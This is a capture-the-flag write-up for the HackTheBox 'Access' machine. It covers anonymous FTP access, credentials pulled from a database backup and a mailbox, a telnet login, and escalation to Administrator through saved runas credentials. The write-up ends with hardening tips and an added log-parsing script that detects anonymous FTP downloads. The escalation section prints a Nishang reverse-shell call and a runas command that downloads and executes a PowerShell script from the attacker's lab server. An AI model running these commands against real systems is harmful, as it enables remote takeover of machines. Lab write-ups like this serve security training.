---
title: "Writeup - Access (HTB)"
date: 2022-04-15
slug: "writeup-access-htb"
type: "writeup-ctf"
---

This is a writeup for the [Access](https://app.hackthebox.com/machines/Access) machine from the HackTheBox site.

## Enumeration

First, let's start with a scan of our target with the following command:

```bash
nmap -sV -T4 -Pn 10.10.10.98
```

Three TCP ports are discovered:

![](img/image-1.webp)

- 21/tcp: FTP
- 23/tcp: telnet
- 80/tcp: HTTP web server (httpd 7.5)

![](img/image-2.webp)

## Exploit

In the `nmap` scan we find an FTP server, so let's try to connect as `anonymous`.

![](img/image-3.webp)

There are 2 folders in which we find the following files:

- Access Control.zip
- backup.mdb

{{< alert >}}
Before downloading the backup file with the command `get backup.mdb` you should use the command `binary`.
{{< /alert >}}

To read the contents of the backup file I use the command `mdb-tables`:

![](img/image-4.webp)

Among the different tables I find `auth_user`, which is interesting: it could contain credentials for an account.

![](img/image-5.webp)

I find an `engineer` account with the password `access4u@security`. I use this password to try to decompress the previously recovered archive. In the archive I find a `.pst` file. To read its contents I use the following command:

```bash
readpst Access\ Control.pst -M
```

Among the different mails I find the following content:

![](img/image-6.webp)

A new password! I try to connect to the telnet server with these credentials.

![](img/image-7.webp)

I now have a shell as `security` and I can get the first flag.

![](img/image-8.webp)

## Privilege escalation

After a few minutes of exploration, I find a file on the Desktop of the `Public` user. In this file I find an interesting command: a `runas` with the user `Administrator`.

![](img/image-9.webp)

I will use this [script](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to create a reverse shell as Admin.

So I get this file and I add the following line at the end of the file:

```powershell
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.17 -Port 1234
```

I then launch a web server on my machine:

```bash
python3 -m http.server 80
```

Then I download and run the script through the Administrator `runas`:

```cmd
runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.17/Invoke-PowerShellTcp.ps1')"
```

I now have a reverse shell as Administrator!

![](img/image-10.webp)

So I can get the last flag.

![](img/image-11.webp)

## Recommendations

To patch this host I think it would be necessary to perform a number of actions:

- Do not leave the `anonymous` user enabled in the FTP server configuration
- Do not store sensitive information in a folder accessible by several people via FTP/web/...
- Do not give a user `runas` Administrator permission
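As an added example for the first two recommendations (this is not part of the original writeup), here is a small detection script that reviews Microsoft FTP W3C logs for anonymous logins that fetched backup or archive files like the ones found on this box. The log lines, file paths and the `#Fields:` layout are constructed for the example; the parser reads the header, so a real log with a different field order works too.

```python
import re
from collections import defaultdict

# Constructed sample in IIS FTP W3C log format. Assumption: the fields are those declared
# in the "#Fields:" header below; the parser keys each entry by that header.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status x-session
2022-04-15 10:00:01 10.10.14.17 - 10.10.10.98 21 USER anonymous 331 0 s1
2022-04-15 10:00:01 10.10.14.17 anonymous 10.10.10.98 21 PASS *** 230 0 s1
2022-04-15 10:00:05 10.10.14.17 anonymous 10.10.10.98 21 RETR /Backups/backup.mdb 226 0 s1
2022-04-15 10:00:09 10.10.14.17 anonymous 10.10.10.98 21 RETR /Engineer/Access+Control.zip 226 0 s1
2022-04-15 10:02:00 10.10.14.3 - 10.10.10.98 21 USER engineer 331 0 s2
2022-04-15 10:02:00 10.10.14.3 engineer 10.10.10.98 21 PASS *** 530 0 s2
"""

# Extensions a defender would not expect to be served to unauthenticated clients.
SENSITIVE = re.compile(r"\.(mdb|zip|pst|bak)$", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_anonymous_sessions(text):
    """Return {session_id: {"ip": ..., "files": [...]}} for sessions whose anonymous
    login succeeded (PASS answered with 230), listing sensitive files they retrieved."""
    sessions = defaultdict(lambda: {"ip": None, "files": []})
    for e in parse_w3c(text):
        sid = e["x-session"]
        if e["cs-method"] == "PASS" and e["sc-status"] == "230" and e["cs-username"].lower() == "anonymous":
            sessions[sid]["ip"] = e["c-ip"]
        elif sid in sessions and e["cs-method"] == "RETR" and SENSITIVE.search(e["cs-uri-stem"]):
            sessions[sid]["files"].append(e["cs-uri-stem"])
    return dict(sessions)


if __name__ == "__main__":
    for sid, info in find_anonymous_sessions(SAMPLE_LOG).items():
        print(f"anonymous session {sid} from {info['ip']} retrieved: {info['files']}")
```

The failed `engineer` login in session `s2` is ignored; only the successful anonymous session and the backup/archive downloads it made are reported.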